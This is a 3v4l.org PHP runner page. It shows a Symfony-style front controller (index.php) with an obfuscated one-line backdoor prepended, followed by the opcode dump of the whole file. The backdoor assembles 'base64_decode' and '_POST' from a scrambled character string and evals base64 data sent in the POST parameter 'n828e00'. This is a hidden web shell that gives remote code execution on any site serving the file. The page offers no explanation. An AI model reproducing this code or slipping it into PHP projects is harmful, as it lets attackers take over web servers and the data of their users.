3v4l.org

run code in 300+ PHP versions simultaneously
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n828e00'];if(isset($s22)){eval($s21($s22));}?><?php /*ordpr*/ if ( false !== strrpos($_SERVER['HTTP_HOST'], 'local') ) { $env = 'dev'; $debug_enabled = true; } else { $env = 'prod'; $debug_enabled = false; } require_once(dirname(__FILE__).'/../config/ProjectConfiguration.class.php'); $configuration = ProjectConfiguration::getApplicationConfiguration('frontend', $env, $debug_enabled); sfContext::createInstance($configuration)->dispatch();
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 47, Position 2 = 51
Branch analysis from position: 47
2 jumps found. (Code = 43) Position 1 = 59, Position 2 = 62
Branch analysis from position: 59
1 jumps found. (Code = 42) Position 1 = 64
Branch analysis from position: 64
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 62
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 51
filename:       /in/Lvmm5
function name:  (null)
number of ops:  81
compiled vars:  !0 = $sF, !1 = $s21, !2 = $s22, !3 = $env, !4 = $debug_enabled, !5 = $configuration
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    1     0  E >   ASSIGN                                                   !0, 'PCT4BA6ODSE_'
          1        INIT_FCALL                                               'strtolower'
          2        FETCH_DIM_R                                      ~7      !0, 4
          3        FETCH_DIM_R                                      ~8      !0, 5
          4        CONCAT                                           ~9      ~7, ~8
          5        FETCH_DIM_R                                      ~10     !0, 9
          6        CONCAT                                           ~11     ~9, ~10
          7        FETCH_DIM_R                                      ~12     !0, 10
          8        CONCAT                                           ~13     ~11, ~12
          9        FETCH_DIM_R                                      ~14     !0, 6
         10        CONCAT                                           ~15     ~13, ~14
         11        FETCH_DIM_R                                      ~16     !0, 3
         12        CONCAT                                           ~17     ~15, ~16
         13        FETCH_DIM_R                                      ~18     !0, 11
         14        CONCAT                                           ~19     ~17, ~18
         15        FETCH_DIM_R                                      ~20     !0, 8
         16        CONCAT                                           ~21     ~19, ~20
         17        FETCH_DIM_R                                      ~22     !0, 10
         18        CONCAT                                           ~23     ~21, ~22
         19        FETCH_DIM_R                                      ~24     !0, 1
         20        CONCAT                                           ~25     ~23, ~24
         21        FETCH_DIM_R                                      ~26     !0, 7
         22        CONCAT                                           ~27     ~25, ~26
         23        FETCH_DIM_R                                      ~28     !0, 8
         24        CONCAT                                           ~29     ~27, ~28
         25        FETCH_DIM_R                                      ~30     !0, 10
         26        CONCAT                                           ~31     ~29, ~30
         27        SEND_VAL                                                 ~31
         28        DO_ICALL                                         $32     
         29        ASSIGN                                                   !1, $32
         30        INIT_FCALL                                               'strtoupper'
         31        FETCH_DIM_R                                      ~34     !0, 11
         32        FETCH_DIM_R                                      ~35     !0, 0
         33        CONCAT                                           ~36     ~34, ~35
         34        FETCH_DIM_R                                      ~37     !0, 7
         35        CONCAT                                           ~38     ~36, ~37
         36        FETCH_DIM_R                                      ~39     !0, 9
         37        CONCAT                                           ~40     ~38, ~39
         38        FETCH_DIM_R                                      ~41     !0, 2
         39        CONCAT                                           ~42     ~40, ~41
         40        SEND_VAL                                                 ~42
         41        DO_ICALL                                         $43     
         42        FETCH_R                      local               ~44     $43
         43        FETCH_DIM_R                                      ~45     ~44, 'n828e00'
         44        ASSIGN                                                   !2, ~45
         45        ISSET_ISEMPTY_CV                                         !2
         46      > JMPZ                                                     ~47, ->51
         47    >   INIT_DYNAMIC_CALL                                        !1
         48        SEND_VAR_EX                                              !2
         49        DO_FCALL                                      0  $48     
         50        INCLUDE_OR_EVAL                                          $48, EVAL
    6    51    >   INIT_FCALL                                               'strrpos'
         52        FETCH_R                      global              ~50     '_SERVER'
         53        FETCH_DIM_R                                      ~51     ~50, 'HTTP_HOST'
         54        SEND_VAL                                                 ~51
         55        SEND_VAL                                                 'local'
         56        DO_ICALL                                         $52     
         57        TYPE_CHECK                                  1018          $52
         58      > JMPZ                                                     ~53, ->62
    7    59    >   ASSIGN                                                   !3, 'dev'
    8    60        ASSIGN                                                   !4, <true>
         61      > JMP                                                      ->64
   10    62    >   ASSIGN                                                   !3, 'prod'
   11    63        ASSIGN                                                   !4, <false>
   14    64    >   INIT_FCALL                                               'dirname'
         65        SEND_VAL                                                 '%2Fin%2FLvmm5'
         66        DO_ICALL                                         $58     
         67        CONCAT                                           ~59     $58, '%2F..%2Fconfig%2FProjectConfiguration.class.php'
         68        INCLUDE_OR_EVAL                                          ~59, REQUIRE_ONCE
   16    69        INIT_STATIC_METHOD_CALL                                  'ProjectConfiguration', 'getApplicationConfiguration'
         70        SEND_VAL_EX                                              'frontend'
         71        SEND_VAR_EX                                              !3
         72        SEND_VAR_EX                                              !4
         73        DO_FCALL                                      0  $61     
         74        ASSIGN                                                   !5, $61
   17    75        INIT_STATIC_METHOD_CALL                                  'sfContext', 'createInstance'
         76        SEND_VAR_EX                                              !5
         77        DO_FCALL                                      0  $63     
         78        INIT_METHOD_CALL                                         $63, 'dispatch'
         79        DO_FCALL                                      0          
         80      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
163.21 ms | 1400 KiB | 21 Q